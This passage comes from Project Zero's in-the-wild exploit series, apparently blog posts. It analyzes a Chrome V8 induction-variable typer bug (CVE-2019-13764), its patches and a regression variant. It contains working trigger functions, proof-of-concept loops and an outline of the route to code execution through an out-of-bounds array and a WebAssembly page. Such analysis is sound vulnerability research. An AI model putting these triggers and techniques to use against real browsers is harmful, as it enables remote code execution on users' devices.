The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.

Conclusion

The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2014, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.

In-the-Wild Series: Chrome Infinity Bug

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

a = Math.min(a, 1);

if (a > 2) {

  return 3;

}
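The reasoning behind this elimination can be modeled with a toy interval type. This is only a sketch under simplifying assumptions: the names rangeMin and canBeGreaterThan are made up for illustration and do not correspond to TurboFan's internal API.

```javascript
// A range is a closed interval { min, max } over JavaScript numbers.
function rangeMin(range, constant) {
  // Math.min(x, c) never exceeds c and never exceeds x's own maximum.
  return {
    min: Math.min(range.min, constant),
    max: Math.min(range.max, constant),
  };
}

function canBeGreaterThan(range, constant) {
  // `x > c` is satisfiable only if the range's maximum exceeds c.
  return range.max > constant;
}

const unknown = { min: -Infinity, max: Infinity };
const afterMin = rangeMin(unknown, 1);                  // a = Math.min(a, 1)
const branchReachable = canBeGreaterThan(afterMin, 2);  // if (a > 2)
console.log(afterMin, branchReachable);
```

Because the modeled maximum is 1, the comparison against 2 can never succeed, so the branch is dead code.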

Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:

a = vuln(a);

let array = [1, 2, 3];

return array[a];

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that, at a certain optimization phase, can be expressed by the following pseudocode:

if (a >= array.length) {

  deoptimize();

}

let elements = array.[[elements]];

return elements.get(a);

get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.
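To make the consequence concrete, here is a toy simulation of the effect. It is a sketch only: the flat memory array stands in for the heap, and compiledLoad and the layout are hypothetical, not how V8 actually lays out objects.

```javascript
// Toy "heap": a 3-element backing store followed by unrelated data.
const memory = [1, 2, 3, "neighbor-0", "neighbor-1"];
const arrayBase = 0;
const arrayLength = 3;

// Models the optimized code: the length check survives only if the
// inferred range says the index might reach the array length.
function compiledLoad(index, inferredMax) {
  const checkNeeded = inferredMax >= arrayLength;
  if (checkNeeded && index >= arrayLength) {
    return "deoptimize";
  }
  return memory[arrayBase + index]; // raw access, no bounds check
}

const correctTyping = compiledLoad(4, 4); // range [0; 4]: check is kept
const wrongTyping = compiledLoad(4, 2);   // range [0; 2]: check is removed
console.log(correctTyping, wrongTyping);
```

With the correct range the access bails out; with the too-narrow range the same index reads a neighboring slot.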

The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:

a = vuln(a); // predicted = false; actual = true

a = a * 10;  // predicted = 0; actual = 10

let array = [1, 2, 3];

return array[a];
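The boolean-to-integer step relies on ordinary JavaScript number conversion, which can be checked in any engine. This is a small sketch with illustrative variable names; it shows only the language semantics, not the compiler's behavior.

```javascript
// Multiplication converts booleans to numbers: false -> 0, true -> 1.
const predicted = false * 10;
const actual = true * 10;

// An index of 10 is far outside a three-element array.
const array = [1, 2, 3];
console.log(predicted, actual, array[predicted], array[actual]);
```

In unoptimized code the out-of-range read simply yields undefined; the problem arises only when the compiler trusts the predicted value and drops the check.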

Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:

Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {

  [...]

  // We only handle integer induction variables (otherwise ranges

  // do not apply and we cannot do anything).

  if (!initial_type.Is(typer_->cache_->kInteger) ||

      !increment_type.Is(typer_->cache_->kInteger)) {

    // Fallback to normal phi typing, but ensure monotonicity.

    // (Unfortunately, without baking in the previous type,

    // monotonicity might be violated because we might not yet have

    // retyped the incrementing operation even though the increment's

    // type might been already reflected in the induction variable

    // phi.)

    Type type = NodeProperties::IsTyped(node)

                    ? NodeProperties::GetType(node)

                    : Type::None();

    for (int i = 0; i < arity; ++i) {

      type = Type::Union(type, Operand(node, i), zone());

    }

    return type;

  }

  // If we do not have enough type information for the initial value

  // or the increment, just return the initial value's type.

  if (initial_type.IsNone() ||

      increment_type.Is(typer_->cache_->kSingletonZero)) {

    return initial_type;

  }

  [...]

  InductionVariable::ArithmeticType arithmetic_type =

      induction_var->Type();

  double min = -V8_INFINITY;

  double max = V8_INFINITY;

  double increment_min;

  double increment_max;

  if (arithmetic_type ==

      InductionVariable::ArithmeticType::kAddition) {

    increment_min = increment_type.Min();

    increment_max = increment_type.Max();

  } else {

    DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction,

              arithmetic_type);

    increment_min = -increment_type.Max();

    increment_max = -increment_type.Min();

  }

  if (increment_min >= 0) {

    // increasing sequence

    min = initial_type.Min();

    for (auto bound : induction_var->upper_bounds()) {

      Type bound_type = TypeOrNone(bound.bound);

      // If the type is not an integer, just skip the bound.

      if (!bound_type.Is(typer_->cache_->kInteger)) continue;

      // If the type is not inhabited, then we can take the initial

      // value.

      if (bound_type.IsNone()) {

        max = initial_type.Max();

        break;

      }

      double bound_max = bound_type.Max();

      if (bound.kind == InductionVariable::kStrict) {

        bound_max -= 1;

      }

      max = std::min(max, bound_max + increment_max);

    }

    // The upper bound must be at least the initial value's upper

    // bound.

    max = std::max(max, initial_type.Max());

  } else if (increment_max <= 0) {

    // decreasing sequence

    [...]

  } else {

    // Shortcut: If the increment can be both positive and negative,

    // the variable can go arbitrarily far, so just return integer.

    return typer_->cache_->kInteger;

  }

  [...]

  return Type::Range(min, max, typer_->zone());

}

Now, imagine the compiler processing the following JavaScript code:

for (var i = initial; i < bound; i += increment) { [...] }

In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.
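The increasing branch can be restated compactly in JavaScript. This is a simplified sketch of the logic quoted above, assuming a single upper bound and interval types written as { min, max }; the function name increasingInductionRange is hypothetical.

```javascript
// `strict` marks a `<` bound as opposed to `<=`.
function increasingInductionRange(initial, increment, bound, strict) {
  if (increment.min < 0) {
    throw new Error("this sketch covers only the increasing branch");
  }
  const boundMax = strict ? bound.max - 1 : bound.max;
  // Upper bound: the last value that passes the loop check, plus one
  // more increment.
  let max = Math.min(Infinity, boundMax + increment.max);
  // The upper bound must be at least the initial value's upper bound.
  max = Math.max(max, initial.max);
  return { min: initial.min, max };
}

// Models: for (var i = 0; i < 10; i += 2) { ... }
const range = increasingInductionRange(
  { min: 0, max: 0 }, { min: 2, max: 2 }, { min: 10, max: 10 }, true);
console.log(range);
```

For this loop the sketch yields the range [0; 11]: the largest value that passes i < 10 is 9, and one more increment of 2 gives 11.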

Note that the algorithm only works with integers; otherwise, a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible:

  • +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
  • The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.
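Both properties follow from standard floating point arithmetic and can be checked directly. The snippet below is a minimal sketch of the language semantics only; note that the typer's integer type is an internal notion and is not the same as Number.isInteger.

```javascript
// Adding opposing infinities leaves the "integer" type.
const sum = Infinity + -Infinity;
const isNaNResult = Number.isNaN(sum);

// NaN compares false with everything, so a loop condition such as
// `i < 0` fails as soon as i becomes NaN.
const conditionHolds = sum < 0;

// Same-signed infinities stay inside the type.
const sameSign = -Infinity + -Infinity;
console.log(sum, isNaNResult, conditionHolds, sameSign);
```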

Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

for (var i = -Infinity; i < 0; i += Infinity) { }

This one line is enough to trigger the issue. The exploit author has had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

function trigger(argument) {

  var j = 0;

  var increment = 100;

  if (argument > 2) {

    increment = Infinity;

  }

  for (var i = -Infinity; i <= -Infinity; i += increment) {

    j++;

    if (j == 20) {

      break;

    }

  }

[...]

The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.

Exploitation

The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For the ease of the reader, we've modified it to be compatible with x64 as well.

[...]

  // The comments display the current value of the variable i, the type

  // inferred by the compiler, and the machine type used to store

  // the value at each step.

  // Initially:

  // actual = NaN, inferred = (-Infinity, +Infinity)

  // representation = double

  i = Math.max(i, 0x100000800);

  // After step one:

  // actual = NaN, inferred = [0x100000800; +Infinity)

  // representation = double

  i = Math.min(0x100000801, i);

  // After step two:

  // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]

  // representation = int64_t

  i -= 0x1000007fa;

  // After step three:

  // actual = -2042, inferred = [6, 7]

  // representation = int32_t

  i >>= 1;

  // After step four:

  // actual = -1021, inferred = 3

  // representation = int32_t

  i += 10;

  // After step five:

  // actual = -1011, inferred = 13

  // representation = int32_t

[...]

The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.

Reduction ConstantFoldingReducer::Reduce(Node* node) {

  DisallowHeapAccess no_heap_access;

  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&

      node->op()->HasProperty(Operator::kEliminatable) &&

      node->opcode() != IrOpcode::kFinishRegion) {

    Node* constant = TryGetConstant(jsgraph(), node);

    if (constant != nullptr) {

      ReplaceWithValue(node, constant);

      return Replace(constant);

[...]

If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.
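The actual values annotated in steps two through five can be re-derived with ordinary arithmetic. This is a sketch under the assumptions stated in the text: the conversion of NaN yields the 64-bit indefinite integer, and step three keeps only the low 32 bits before subtracting 0x7fa. BigInt is used here only to model the 64-bit value.

```javascript
// Result of CVTTSD2SI for a NaN input: the 64-bit "indefinite integer".
const indefinite = -0x8000000000000000n;

// Step three, as compiled: keep the low 32 bits, then subtract 0x7fa.
const low32 = BigInt.asIntN(32, indefinite);
let actual = Number(low32) - 0x7fa;
const afterStepThree = actual;

// Inferred range for the same step, computed on the predicted values.
const inferredMin = 0x100000800 - 0x1000007fa;
const inferredMax = 0x100000801 - 0x1000007fa;

actual >>= 1;  // step four
actual += 10;  // step five
console.log(afterStepThree, actual, inferredMin, inferredMax);
```

The low 32 bits of the indefinite value are all zero, which is why the actual value after step three is simply -0x7fa, or -2042.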

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {

[...]

} else if (arity == 1) {

  Node* length = NodeProperties::GetValueInput(node, 2);

  Type length_type = NodeProperties::GetType(length);

  if (!length_type.Maybe(Type::Number())) {

    // Handle the single argument case, where we know that the value

    // cannot be a valid Array length.

    elements_kind = GetMoreGeneralElementsKind(

        elements_kind, IsHoleyElementsKind(elements_kind)

                           ? HOLEY_ELEMENTS

                           : PACKED_ELEMENTS);

    return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

  }

  if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&

      length_type.Max() <= kElementLoopUnrollLimit &&

      length_type.Min() == length_type.Max()) {

    int capacity = static_cast<int>(length_type.Max());

    return ReduceNewArray(node, length, capacity, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

[...]

When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding the function keeps using the original argument node. The folded value is employed during initialization of the backing store while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with a negative length and a backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the crafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.
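The effect of an unsigned comparison on a negative length can be illustrated with plain integer arithmetic. This sketch assumes a 32-bit comparison for simplicity; the exact width and encoding V8 uses for lengths may differ, and passesBoundsCheck is a hypothetical helper.

```javascript
const length = -1011;   // actual value stored in the length property
const capacity = 13;    // elements the backing store can really hold

// `>>> 0` reinterprets a 32-bit signed value as unsigned.
const unsignedLength = length >>> 0;

// Models an unsigned `index < length` bounds check.
function passesBoundsCheck(index) {
  return (index >>> 0) < unsignedLength;
}

console.log(unsignedLength, passesBoundsCheck(capacity + 1000));
```

Interpreted as unsigned, the length becomes a value close to 2^32, so indices far beyond the 13-element backing store still pass the check.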

The rest of the trigger function is provided below:

[...]

  corrupted_array = Array(i);

  corrupted_array[0] = 1.1;

  ptr_leak_array = [wasm_module, array_buffer, [...],

                    wasm_module, array_buffer]; 

  extra_array = [13.37, [...], 13.37, 1.234]; 

  return [corrupted_array, ptr_leak_array, extra_array];

}

The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

  1. Locate the required pointers and object fields through pattern-matching.
  2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
  3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
  4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
  5. Finally, execute it.

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.

Patch 1

Even though there’s evidence this vulnerability was originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

function write(begin, end, step) {

  for (var i = begin; i >= end; i += step) {

    step = end - begin;

    begin >>>= 805306382;

  }

}

var buffer = new ArrayBuffer(16384);

var view = new Uint32Array(buffer);

for (let i = 0; i < 10000; i++) {

  write(Infinity, 1, view[65536], 1);

}

As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers. However, after an internal discussion, the V8 team raised the severity rating to high.

In the light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:

[...]

const bool both_types_integer =

    initial_type.Is(typer_->cache_->kInteger) &&

    increment_type.Is(typer_->cache_->kInteger);

bool maybe_nan = false;

// The addition or subtraction could still produce a NaN, if the integer

// ranges touch infinity.

if (both_types_integer) {

  Type resultant_type =

      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)

          ? typer_->operation_typer()->NumberAdd(initial_type,

                                                 increment_type)

          : typer_->operation_typer()->NumberSubtract(initial_type,

                                                      increment_type);

  maybe_nan = resultant_type.Maybe(Type::NaN());

}

// We only handle integer induction variables (otherwise ranges

// do not apply and we cannot do anything).

if (!both_types_integer || maybe_nan) {

[...]

The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but demonstrated in the proof of concept sent to Chrome. The typer takes into account these changes and reflects them in increment’s computed type. Therefore, the attacker can, for example, add negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:

var increment = -Infinity;

var k = 0;

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    increment = +Infinity;

  }

  if (++k > 10) {

    break;

  }

}
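Running the same loop in plain JavaScript and recording the values of i shows where NaN appears. This is a minimal sketch of the language semantics only; the wrapper runVariantLoop and the seen array are added for illustration.

```javascript
function runVariantLoop() {
  const seen = [];
  let increment = -Infinity;
  let k = 0;
  let i;
  for (i = 0; i < 1; i += increment) {
    seen.push(i);
    if (i == -Infinity) {
      increment = +Infinity;
    }
    if (++k > 10) {
      break;
    }
  }
  return { seen, final: i };
}

const result = runVariantLoop();
console.log(result.seen, result.final);
```

The body observes 0 and then -Infinity; the next update adds +Infinity to -Infinity, so the loop exits with i equal to NaN, even though neither 0 + -Infinity nor 0 + +Infinity is NaN on its own.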

Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.

Patch 2

The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.

[...]

// If we do not have enough type information for the initial value or

// the increment, just return the initial value's type.

if (initial_type.IsNone() ||

    increment_type.Is(typer_->cache_->kSingletonZero)) {

  return initial_type;

}

// We only handle integer induction variables (otherwise ranges do not

// apply and we cannot do anything). Moreover, we don't support infinities

// in {increment_type} because the induction variable can become NaN

// through addition/subtraction of opposing infinities.

if (!initial_type.Is(typer_->cache_->kInteger) ||

    !increment_type.Is(typer_->cache_->kInteger) ||

    increment_type.Min() == -V8_INFINITY ||

    increment_type.Max() == +V8_INFINITY) {

[...]

Additionally, ReduceJSCreateArray was updated to always use the same value for both the length property and backing store capacity, thus rendering the reported exploitation technique useless.

Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:

-0 + 0 => 0

[string] - 0 => [number]

[object] + 0 => [string]

As a result, the patched function provides us with an even wider choice of possible “type confusions”.
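These conversions are standard JavaScript behavior and can be checked in any engine. The snippet below is a small sketch with illustrative variable names; Object.is is used because === cannot distinguish 0 from -0.

```javascript
// -0 + 0 is +0, so even a number can leave its original (singleton) type.
const negZeroPlusZero = -0 + 0;

// Subtraction converts a string operand to a number.
const stringMinusZero = "30" - 0;

// Addition with an object operand falls back to string concatenation.
const objectPlusZero = {} + 0;

console.log(
  Object.is(negZeroPlusZero, 0),
  typeof stringMinusZero,
  typeof objectPlusZero);
```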

It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

function trigger(arg) {

  // Initially:

  // actual = 1, inferred = any

  var k = 0;

 

  arg = arg | 0;

  // After step one:

  // actual = 1, inferred = [-0x80000000, 0x7fffffff]

 

  arg = Math.min(arg, 2);

  // After step two:

  // actual = 1, inferred = [-0x80000000, 2]

 

  arg = Math.max(arg, 1);

  // After step three:

  // actual = 1, inferred = [1, 2]

 

  if (arg == 1) {

    arg = "30";

  }

  // After step four:

  // actual = string{30}, inferred = [1, 2] or string{30}

 

  for (var i = arg; i < 0x1000; i -= 0) {

    if (++k > 1) {

      break;

    }

  }

  // After step five:

  // actual = number{30}, inferred = [1, 2] or string{30}

 

  i += 1;

  // After step six:

  // actual = 31, inferred = [2, 3]

 

  i >>= 1;

  // After step seven:

  // actual = 15, inferred = 1

 

  i += 2;

  // After step eight:

  // actual = 17, inferred = 3

 

  i >>= 1;

  // After step nine:

  // actual = 8, inferred = 1

  var array = [0.1, 0.1, 0.1, 0.1];

  return [array[i], array];

}

The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.
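The actual values in the comments can be reproduced by running the same operations without any optimization. This is only a sketch of the interpreter-level semantics; the wrapper actualValues and the steps array are added for illustration.

```javascript
function actualValues(arg) {
  const steps = [];
  arg = arg | 0;
  arg = Math.min(arg, 2);
  arg = Math.max(arg, 1);
  if (arg == 1) {
    arg = "30";
  }
  let k = 0;
  let i;
  // Subtracting zero converts the string "30" to the number 30.
  for (i = arg; i < 0x1000; i -= 0) {
    if (++k > 1) {
      break;
    }
  }
  steps.push(i);          // after step five
  i += 1; steps.push(i);  // after step six
  i >>= 1; steps.push(i); // after step seven
  i += 2; steps.push(i);  // after step eight
  i >>= 1; steps.push(i); // after step nine
  return steps;
}

const steps = actualValues(1);
console.log(steps);
```

The final actual index is 8, while the typer predicts 1 for a four-element array, which is why removing the check exposes memory past the end of the backing store.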

Patch 3

Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

  • Extended element access hardening, which now prevents the abuse of NumberLessThan nodes.
  • Discovered and fixed a similar problem with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
  • Implemented a verifier for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.

Conclusion

This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.
